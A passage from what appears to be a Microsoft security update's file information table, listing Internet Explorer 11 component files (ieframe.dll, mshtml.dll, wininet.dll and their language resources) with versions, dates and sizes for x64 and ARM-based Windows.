\nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 15,506,944 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:41| 24,486 \nieinstal.exe| 11.0.9600.18639| 25-Mar-2017| 10:20| 492,032 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:14| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:57| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:03| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \ninetres.admx| Not versioned| 8-Feb-2021| 20:02| 1,678,023 \ninetcomm.dll| 6.3.9600.19963| 12-Feb-2021| 18:36| 1,033,216 \nINETRES.dll| 6.3.9600.16384| 22-Aug-2013| 4:43| 84,480 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 19:04| 5,499,904 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 19:03| 814,592 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 19:04| 785,408 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 19:15| 581,120 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 18:58| 20,296,192 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nwow64_Microsoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:43| 3,228 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:09| 13,881,856 \nie9props.propdesc| Not versioned| 23-Sep-2013| 19:34| 2,843 \nwow64_ieframe.ptxml| Not versioned| 5-Feb-2014| 21:43| 24,486 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 4,112,384 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:37| 653,824 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:47| 498,176 \nactxprxy.dll| 6.3.9600.19301| 25-Feb-2019| 22:20| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 17:50| 1,343,488 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:30| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:12| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 17:53| 4,388,352 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \niedkcs32.dll| 18.0.9600.19963| 12-Feb-2021| 18:11| 333,312 \ninstall.ins| Not versioned| 12-Feb-2021| 16:25| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 710,656 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 18:59| 772,608 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.19846| 23-Sep-2020| 20:01| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 2,308,096 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:32| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \ninetcomm.dll| 6.3.9600.19963| 12-Feb-2021| 18:17| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \n \n## \n\n__\n\nInternet Explorer 11 on all supported ARM-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.19301| 25-Feb-2019| 21:59| 1,064,960 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:30| 68,608 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 47,616 \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 17:33| 1,039,360 \niexplore.exe| 11.0.9600.19867| 12-Oct-2020| 22:01| 807,816 \nWininetPlugin.dll| 6.3.9600.16384| 21-Aug-2013| 19:52| 33,792 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 10:19| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:10| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nhtml.iec| 2019.0.0.19301| 25-Feb-2019| 22:35| 320,000 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 17:51| 2,007,040 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 307,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,888 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,304 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,008 \nmshtml.dll.mui| 11.0.9600.19507| 